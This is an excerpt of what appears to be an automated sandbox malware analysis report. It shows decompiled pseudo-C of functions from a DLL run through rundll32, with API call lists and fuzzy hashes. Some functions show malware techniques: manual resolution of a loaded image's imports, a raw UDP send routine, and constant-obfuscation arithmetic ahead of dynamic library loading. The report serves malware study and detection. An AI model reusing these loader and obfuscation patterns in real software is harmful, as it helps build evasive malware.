					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x10058170; // 0x4a71348
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x10057d48;
								if(__eflags != 0) {
									_push(_t33);
									E10016380(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x10058170; // 0x4a71348
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x10058170; // 0x4a71348
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E1001D757();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E10017DA6(_t25, _t29, _t31, 0x20);
				}
				return E10019891(_t33);
			}

APIs

Part of subcall function 1001BF79: __getptd_noexit.LIBCMT ref: 1001BF7A
Part of subcall function 1001BF79: __amsg_exit.LIBCMT ref: 1001BF87

__amsg_exit.LIBCMT ref: 1001D6E8
__lock.LIBCMT ref: 1001D6F8
InterlockedDecrement.KERNEL32(?), ref: 1001D715
InterlockedIncrement.KERNEL32(04A71348), ref: 1001D740

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
String ID:
API String ID: 2880340415-0
Opcode ID: c820c896aabaa0a2095c39d05bd9b26938a44304a92efda62120de517e880afa
Instruction ID: ba7e7af5003a78fddfad0021ce05134b2f36e9a59f0d2c47ef46babd1389d2ef
Opcode Fuzzy Hash: c820c896aabaa0a2095c39d05bd9b26938a44304a92efda62120de517e880afa
Instruction Fuzzy Hash: 95016D39904A21EBEB41FB65988679D77A4FF05790F11410AE804AF291DB34E9C2CB95

Uniqueness

Uniqueness Score: -1.00%

Function 100126F9, Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100126F9(void* __ecx, CHAR* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				void* _t16;
				struct HINSTANCE__* _t17;
				void* _t18;

				_t14 = 0;
				_t11 = 0;
				_t19 = _a4;
				_t18 = __ecx;
				if(_a4 == 0) {
					L4:
					_t16 = E100122B0(_t11, _t18, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t16;
				}
				_t17 =  *(E1000D5EC(0, 0, _t15, _t19) + 0xc);
				_t8 = FindResourceA(_t17, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t17, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 1001271B
LoadResource.KERNEL32(?,00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 10012727
LockResource.KERNEL32(00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 10012734
FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 1001274F

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 8a3f5fca82a0f9630a7b8cc452aba64c847f2dafa8f29946bde4c5ad79aa4676
Instruction ID: 32ecfa8a0ceb179aec2dc768c20ccd4f8790d9104fa4174b83ef058a4c527ff5
Opcode Fuzzy Hash: 8a3f5fca82a0f9630a7b8cc452aba64c847f2dafa8f29946bde4c5ad79aa4676
Instruction Fuzzy Hash: 54F090762042226FA3019B675C88A3BB7ECEFC55E2B110039FE04D6291EE35CC629771

Uniqueness

Uniqueness Score: -1.00%

Function 10001360, Relevance: 6.0, APIs: 4, Instructions: 40
networkCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E10001360(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				short _v20;
				short _v22;
				char _v24;
				intOrPtr _v28;
				signed int _t15;
				short _t18;
				intOrPtr _t31;
				signed int _t33;

				_t15 =  *0x10057a08; // 0x4959db98
				_v8 = _t15 ^ _t33;
				_v28 = __ecx;
				_t18 = E100174D0(_t31,  &_v24, 0, 0x10);
				_v24 = 2;
				__imp__#11(_a4);
				_v20 = _t18;
				__imp__#9(_a8);
				_v22 = _t18;
				__imp__#20(_a12, _a16, 0,  &_v24, 0x10);
				return E100167D5(_v28, __ebx, _v8 ^ _t33, _a12, _t31, __esi,  *((intOrPtr*)(_v28 + 0x24)));
			}

0x10001366
0x1000136d
0x10001370
0x1000137b
0x10001383
0x1000138d
0x10001393
0x1000139b
0x100013a1
0x100013bc
0x100013cf

APIs

_memset.LIBCMT ref: 1000137B
inet_addr.WS2_32(?), ref: 1000138D
htons.WS2_32(?), ref: 1000139B
sendto.WS2_32(?,?,00000002,00000000,00000002,00000010), ref: 100013BC

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _memsethtonsinet_addrsendto
String ID:
API String ID: 1158618643-0
Opcode ID: 55dc4d04b4578ce397bb679e501a1161249c23db44447d4e71df0ac46d681eb6
Instruction ID: 4ca8e198367322d4385a70dad1c3d41f0382a071c465ebc2c9307440f54d584b
Opcode Fuzzy Hash: 55dc4d04b4578ce397bb679e501a1161249c23db44447d4e71df0ac46d681eb6
Instruction Fuzzy Hash: D0017CB590020DABDB00DFA4CC86EAE77B8FF48300F104419F905AB281EB70AA40DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1000CCD3, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CCD3() {
				intOrPtr _t16;
				struct HWND__* _t19;
				intOrPtr _t23;
				intOrPtr* _t28;
				void* _t29;

				_t28 =  *((intOrPtr*)(_t29 - 0x20));
				_t23 =  *((intOrPtr*)(_t29 - 0x24));
				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
					E10012913(_t23, 1);
				}
				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
					EnableWindow( *(_t29 - 0x14), 1);
				}
				if( *(_t29 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
						SetActiveWindow( *(_t29 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t28 + 0x60))();
				E1000C6E6(_t23, _t28, 0, _t28, _t34);
				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
					FreeResource( *(_t29 - 0x18));
				}
				_t16 =  *((intOrPtr*)(_t28 + 0x44));
				return E10017C60(_t16);
			}

APIs

EnableWindow.USER32(?,00000001), ref: 1000CCF3
GetActiveWindow.USER32 ref: 1000CCFE
SetActiveWindow.USER32(?,?,00000024,100014EC,00000000,4959DB98), ref: 1000CD0C
FreeResource.KERNEL32(?,?,00000024,100014EC,00000000,4959DB98), ref: 1000CD28

Part of subcall function 10012913: EnableWindow.USER32(?,4959DB98), ref: 10012920

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$ActiveEnable$FreeResource
String ID:
API String ID: 253586258-0
Opcode ID: 5728dce3dbdb708f9e7fb54369dca357d78a73ff54a3e2536421aa2b19b7c5fa
Instruction ID: b9d50a594c6b72ab84edc47d27728691b22d7b2ae70339502ef362fb55dd66ce
Opcode Fuzzy Hash: 5728dce3dbdb708f9e7fb54369dca357d78a73ff54a3e2536421aa2b19b7c5fa
Instruction Fuzzy Hash: 97F04F3890071DDBEF12DB64C98599DBBF2FF48781B60002AE442722A5CB326D81DF51

Uniqueness

Uniqueness Score: -1.00%

Function 1000AD21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E1000AD21(void* __ecx) {
				signed int _v8;
				char _v16;
				char _v18;
				char _v280;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				long _t14;
				intOrPtr _t15;
				char* _t18;
				intOrPtr _t21;
				intOrPtr _t33;
				signed int _t36;

				_t11 =  *0x10057a08; // 0x4959db98
				_v8 = _t11 ^ _t36;
				_t35 = 0x104;
				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
				if(_t14 == 0 || _t14 == 0x104) {
					L4:
					_t15 = 0;
					__eflags = 0;
				} else {
					_t18 = PathFindExtensionA( &_v280);
					_t35 = "%s.dll";
					asm("movsd");
					asm("movsw");
					_t32 =  &_v280;
					_t41 = _t18 -  &_v280 + 7 - 0x106;
					asm("movsb");
					_t33 = _t33;
					if(_t18 -  &_v280 + 7 > 0x106) {
						goto L4;
					} else {
						E1000A7B3(_t21,  &_v280, _t33, "%s.dll", _t36, _t18,  &_v18 - _t18,  &_v16);
						_t15 = E1000AA3A(_t21,  &_v280, _t33, "%s.dll", _t41,  &_v280);
					}
				}
				return E100167D5(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
			}

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 1000AD47
PathFindExtensionA.SHLWAPI(?), ref: 1000AD5D

Part of subcall function 1000A7B3: _strcpy_s.LIBCMT ref: 1000A7BF

Part of subcall function 1000AA3A: __EH_prolog3.LIBCMT ref: 1000AA59
Part of subcall function 1000AA3A: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 1000AA7A
Part of subcall function 1000AA3A: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1000AA8B
Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC1
Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC9
Part of subcall function 1000AA3A: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1000AADD
Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AB01
Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(000003FF), ref: 1000AB07
Part of subcall function 1000AA3A: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 1000AB40

Strings

%s.dll, xrefs: 1000AD63

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
String ID: %s.dll
API String ID: 3444012488-3668843792
Opcode ID: 6c30b6a237bf11204af5acb5ac5b7830e50b8e52d34c93bd03a652aa76484c2b
Instruction ID: a3b0371864cf8cb86b39257a88ab5a21b33b2e0076ae9bf6281b2400efea00f1
Opcode Fuzzy Hash: 6c30b6a237bf11204af5acb5ac5b7830e50b8e52d34c93bd03a652aa76484c2b
Instruction Fuzzy Hash: AD01F972A00018AFEF08DB74CD45DEE73B8DF46740F4102AAE906D3544EA70AB848662

Uniqueness

Uniqueness Score: -1.00%

Function 10002670, Relevance: 5.2, APIs: 4, Instructions: 181
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10002670(intOrPtr __ecx, intOrPtr* _a4) {
				void* _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				signed int* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr _t133;
				intOrPtr _t138;
				void* _t202;
				void* _t203;

				_v44 = __ecx;
				_v20 =  *((intOrPtr*)(_a4 + 4));
				_v16 = 1;
				_v12 =  *_a4 + 0x80;
				if( *((intOrPtr*)(_v12 + 4)) != 0) {
					_v8 = _v20 +  *_v12;
					while(IsBadReadPtr(_v8, 0x14) == 0 &&  *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t114 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c))))(_v20 +  *((intOrPtr*)(_v8 + 0xc)),  *((intOrPtr*)(_a4 + 0x28)));
						_t203 = _t202 + 8;
						_v36 = _t114;
						if(_v36 != 0) {
							_t116 = E10001F00( *((intOrPtr*)(_a4 + 8)), 4 +  *(_a4 + 0xc) * 4);
							_t202 = _t203 + 8;
							_v28 = _t116;
							if(_v28 != 0) {
								 *((intOrPtr*)(_a4 + 8)) = _v28;
								 *((intOrPtr*)( *((intOrPtr*)(_a4 + 8)) +  *(_a4 + 0xc) * 4)) = _v36;
								 *(_a4 + 0xc) =  *(_a4 + 0xc) + 1;
								if( *_v8 == 0) {
									_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
								} else {
									_v32 = _v20 +  *_v8;
									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
								}
								while( *_v32 != 0) {
									if(( *_v32 & 0x80000000) == 0) {
										_v40 = _v20 +  *_v32;
										_t133 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))(_v36, _v40 + 2,  *((intOrPtr*)(_a4 + 0x28)));
										_t202 = _t202 + 0xc;
										 *_v24 = _t133;
									} else {
										_t138 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))(_v36,  *_v32 & 0x0000ffff,  *((intOrPtr*)(_a4 + 0x28)));
										_t202 = _t202 + 0xc;
										 *_v24 = _t138;
									}
									if( *_v24 != 0) {
										_v32 =  &(_v32[1]);
										_v24 = _v24 + 4;
										continue;
									} else {
										_v16 = 0;
										break;
									}
								}
								if(_v16 != 0) {
									_v8 = _v8 + 0x14;
									continue;
								}
								 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x24))))(_v36,  *((intOrPtr*)(_a4 + 0x28)));
								SetLastError(0x7f);
								break;
							}
							 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x24))))(_v36,  *((intOrPtr*)(_a4 + 0x28)));
							SetLastError(0xe);
							_v16 = 0;
							break;
						}
						SetLastError(0x7e);
						_v16 = 0;
						break;
					}
					return _v16;
				}
				return 1;
			}

APIs

IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,10002C4E,00000000,00000000), ref: 100026C5
SetLastError.KERNEL32(0000007E), ref: 10002707

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: c2a98b38cbef77d555c79c56aa9516de66013d98deec03bde9f9d281594a25e0
Instruction ID: 5b18a635dcf056017fd1ee77a603d3a0bb8baed770e763f1765233b10108ec1d
Opcode Fuzzy Hash: c2a98b38cbef77d555c79c56aa9516de66013d98deec03bde9f9d281594a25e0
Instruction Fuzzy Hash: 7381BAB4A05209DFDB04CF94C880A9EB7B1FF88354F248159E819AB355D735EE82CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1001431B, Relevance: 5.0, APIs: 4, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E1001431B(void* __ebx, void* __esi, void* __ebp, signed int _a4) {
				void* __edi;
				struct _CRITICAL_SECTION* _t4;
				void* _t7;
				void* _t10;
				signed int _t11;
				void* _t14;
				intOrPtr* _t15;
				void* _t17;

				_t17 = __ebp;
				_t14 = __esi;
				_t7 = __ebx;
				_t11 = _a4;
				_t20 = _t11 - 0x11;
				if(_t11 >= 0x11) {
					_t4 = E1000A0DB(__ebx, _t10, _t11, __esi, _t20);
				}
				if( *0x1005aac0 == 0) {
					_t4 = E100142F7();
				}
				_push(_t7);
				_push(_t17);
				_push(_t14);
				_t15 = 0x1005ac78 + _t11 * 4;
				if( *_t15 == 0) {
					EnterCriticalSection(0x1005ac60);
					if( *_t15 == 0) {
						_t4 = 0x1005aac8 + _t11 * 0x18;
						InitializeCriticalSection(_t4);
						 *_t15 =  *_t15 + 1;
					}
					LeaveCriticalSection(0x1005ac60);
				}
				EnterCriticalSection(0x1005aac8 + _t11 * 0x18);
				return _t4;
			}

APIs

EnterCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014357
InitializeCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014366
LeaveCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014373
EnterCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 1001437F

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
String ID:
API String ID: 2895727460-0
Opcode ID: fc52205701aaf5afb0ce0b222181c69e48b6197276059f190c1bff8ca6cb0e4a
Instruction ID: b2ae72b8ab0fae698251e24a42d2174316ff56aad592cf34d272a36c1b8e20b9
Opcode Fuzzy Hash: fc52205701aaf5afb0ce0b222181c69e48b6197276059f190c1bff8ca6cb0e4a
Instruction Fuzzy Hash: 05F090739002169BE700DF59CC89A1ABBA9FBC32A5F93011AF14096121DB3199C5CA61

Uniqueness

Uniqueness Score: -1.00%

Function 1001398E, Relevance: 5.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1001398E(long* __ecx, signed int _a4) {
				void* _t9;
				struct _CRITICAL_SECTION* _t12;
				signed int _t14;
				long* _t16;

				_t16 = __ecx;
				_t1 =  &(_t16[7]); // 0x1005aaa8
				_t12 = _t1;
				EnterCriticalSection(_t12);
				_t14 = _a4;
				if(_t14 <= 0) {
					L5:
					LeaveCriticalSection(_t12);
					return 0;
				}
				_t3 =  &(_t16[3]); // 0x3
				if(_t14 >=  *_t3) {
					goto L5;
				}
				_t9 = TlsGetValue( *_t16);
				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
					goto L5;
				} else {
					LeaveCriticalSection(_t12);
					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
				}
			}

APIs

EnterCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 10013997
TlsGetValue.KERNEL32(1005AA8C,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139AC
LeaveCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139C2
LeaveCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139CD

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 8c266227b3abe2b759591ba9b775a43eab1fad3fbd471f069813da335311fd75
Instruction ID: ae8276b6876f5357c50f650584214137971e28de593e3cdb7c29343fae997712
Opcode Fuzzy Hash: 8c266227b3abe2b759591ba9b775a43eab1fad3fbd471f069813da335311fd75
Instruction Fuzzy Hash: 27F012762006529FD710DF65CC8C90B77EDEF84291327D856E84697152D770F856CF50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6172 Parent PID: 7112 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	18.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	1075
Total number of Limit Nodes:	16

Executed Functions

Function 04C752B9, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E04C752B9(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t47;
				struct HINSTANCE__* _t59;
				signed int _t61;
				signed int _t62;
				WCHAR* _t68;

				_push(_a12);
				_t68 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E04C8FE29(_t47);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x68392e;
				_v16 = 0xf5950b;
				_v16 = _v16 ^ 0xb3325752;
				_v16 = _v16 ^ 0xe58473b2;
				_v16 = _v16 ^ 0x56462a2c;
				_v8 = 0x3988bb;
				_t61 = 0x3a;
				_v8 = _v8 / _t61;
				_v8 = _v8 + 0xf338;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0x0035ea14;
				_v12 = 0xe53120;
				_v12 = _v12 ^ 0xa236e8c8;
				_t62 = 0x62;
				_v12 = _v12 / _t62;
				_v12 = _v12 ^ 0x01ab7b97;
				_v20 = 0x973198;
				_v20 = _v20 * 0x60;
				_v20 = _v20 ^ 0x38bce55b;
				E04C7EB52(_t62, _t62, 0xeec842c3, 0xab, 0xa2289af1);
				_t59 = LoadLibraryW(_t68); // executed
				return _t59;
			}

0x04c752c0
0x04c752c3
0x04c752c5
0x04c752c8
0x04c752cc
0x04c752cd
0x04c752d2
0x04c752d9
0x04c752e2
0x04c752e9
0x04c752f0
0x04c752f7
0x04c752fe
0x04c7530a
0x04c7530f
0x04c75314
0x04c7531b
0x04c7531f
0x04c75326
0x04c7532d
0x04c75337
0x04c7533f
0x04c75342
0x04c75349
0x04c75360
0x04c75363
0x04c75376
0x04c7537f
0x04c75385

APIs

LoadLibraryW.KERNEL32 ref: 04C7537F

Strings

.9h, xrefs: 04C752D9
,*FV, xrefs: 04C752F7
1, xrefs: 04C75326

Memory Dump Source

Source File: 00000004.00000002.353774398.0000000004C71000.00000020.00000001.sdmp, Offset: 04C70000, based on PE: true

Associated: 00000004.00000002.353766551.0000000004C70000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.353822075.0000000004C96000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c70000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: 1$,*FV$.9h
API String ID: 1029625771-1870595533
Opcode ID: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
Instruction ID: d8d0ea7acafb1f268511506cd295e9407c8826416e662177c2093e572a5587a1
Opcode Fuzzy Hash: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
Instruction Fuzzy Hash: 952156B6D00208FBEF08DFA8D94A9EEBBB5FB40304F108198E815A6250D3B46B14DF90

Uniqueness

Uniqueness Score: -1.00%

Function 04C91538, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E04C91538(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t59;
				int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;

				_push(_a4);
				E04C8FE29(_t59);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x73095a;
				_v28 = 0xd34a52;
				_v16 = 0xb3a153;
				_t77 = 0x73;
				_v16 = _v16 / _t77;
				_v16 = _v16 + 0x4fd2;
				_v16 = _v16 ^ 0xee3af97f;
				_v16 = _v16 ^ 0xee3510f4;
				_v20 = 0xee2064;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x88190a0a;
				_v12 = 0x72c7a5;
				_v12 = _v12 + 0x7839;
				_t78 = 0x77;
				_v12 = _v12 / _t78;
				_t79 = 0x76;
				_v12 = _v12 / _t79;
				_v12 = _v12 ^ 0x00040652;
				_v8 = 0x10c7fb;
				_t80 = 0x6c;
				_v8 = _v8 * 0x70;
				_v8 = _v8 << 8;
				_v8 = _v8 / _t80;
